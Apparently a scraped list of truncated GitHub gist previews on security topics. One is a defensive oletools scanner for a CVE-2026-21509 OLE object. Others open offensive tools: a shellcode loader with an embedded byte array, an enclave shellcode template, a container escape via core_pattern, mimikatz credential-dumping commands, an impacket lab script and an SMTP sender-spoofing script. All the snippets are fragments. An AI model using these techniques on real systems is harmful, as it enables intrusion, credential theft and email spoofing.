| # script to scan MS Office files, looking for "Shell.Explorer" OLE objects which could match CVE-2026-21509 | |
| # using oletools - https://github.com/decalage2/oletools | |
| # Philippe Lagadec 2026-01-28 | |
| # NOTES: | |
| # According to the MS advisory https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21509 | |
| # the CVE-2026-21509 vulnerability is related to CLSID "EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B", | |
| # corresponding to the "Shell.Explorer" COM object, which can be used to open the legacy | |
| # Internet Explorer engine (aka Trident/MSHTML) from any application. | |
| # So to exploit CVE-2026-21509 from a MS Office document, one could use either an OLE object |
| #include <windows.h> | |
| #include <wininet.h> | |
| #include <stdio.h> | |
| #pragma comment(lib, "wininet.lib") | |
| // notepad.exe shellcode | |
| char shellcode[] = { | |
| 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, | |
| 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, |
| #include <stdio.h> | |
| #include <windows.h> | |
| // Shellcode template from: https://gist.github.com/kkent030315/b508e56a5cb0e3577908484fa4978f12 | |
| // Compile using: x86_64-w64-mingw32-gcc -m64 enclave.c -o enclace.exe -lntdll | |
| EXTERN_C NTSYSAPI | |
| NTSTATUS | |
| NTAPI LdrCallEnclave( | |
| _In_ PENCLAVE_ROUTINE Routine, |
| stream { | |
| map $ssl_preread_server_name $singbox { | |
| trojan.example.com trojan; | |
| trojan-ws.example.com trojan-ws; | |
| trojan-ws-6.example.com trojan-ws-6; | |
| vmess.example.com vmess; | |
| vmess-ws.example.com vmess-ws; | |
| vmess-ws-6.example.com vmess-ws-6; | |
| } | |
| upstream trojan { |
| from impacket.dcerpc.v5 import epm, lsad, rpcrt, transport, lsat, ndr, nrpc | |
| from impacket.uuid import bin_to_uuidtup | |
| from binascii import unhexlify | |
| from random import randbytes | |
| import sys | |
| # Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3) | |
| # Pure TCP RPC is used (ncacn_ip_tcp option) | |
| # AES is used, so you need impacket #1848 (https://github.com/fortra/impacket/pull/1848) | |
| # Tested with impacket 0.12.0 on GOAD |
| # Copyright (c) 2023 Ho Kim (ho.kim@ulagbulag.io). All rights reserved. | |
| # Configure environment variables | |
| ARG ROCKYLINUX_VERSION="8" | |
| # Be ready for serving | |
| FROM "quay.io/rockylinux/rockylinux:${ROCKYLINUX_VERSION}" as base | |
| # Install desktop environment dependencies | |
| RUN dnf install -y \ |
| #!/usr/bin/env python | |
| # Impacket - Collection of Python classes for working with network protocols. | |
| # | |
| # Copyright Fortra, LLC and its affiliated companies | |
| # | |
| # All rights reserved. | |
| # | |
| # This software is provided under a slightly modified version | |
| # of the Apache Software License. See the accompanying LICENSE file | |
| # for more information. |
| #!/bin/bash | |
| # | |
| # core_pattern_escape.sh | |
| # Simple script to escape a container via /proc/sys/kernel/core_pattern | |
| # By J. Stuart McMurray | |
| # Created 20241026 | |
| # Last Modified 20241026 | |
| # Drop to /esc (or whatever name) in a container and... | |
| # |
| #general | |
| privilege::debug | |
| log | |
| log customlogfilename.log | |
| #sekurlsa | |
| sekurlsa::logonpasswords | |
| sekurlsa::logonPasswords full |
| from socket import * | |
| mail_server = ("tantotesting.mail.protection.outlook.com", 25) | |
| client_socket = socket(AF_INET, SOCK_STREAM) | |
| helo = "helo tantomail.com" | |
| mail_from = "mail from: <testing@tantomail.com>" | |
| rcpt_to = "rcpt to: <john.doe@tantotesting.onmicrosoft.com>" | |
| mail = """from: \x1f <,><testing@tantomail.com>\r | |
| sender: "James Bond" <james.bond@tantotesting.onmicrosoft.com>\r |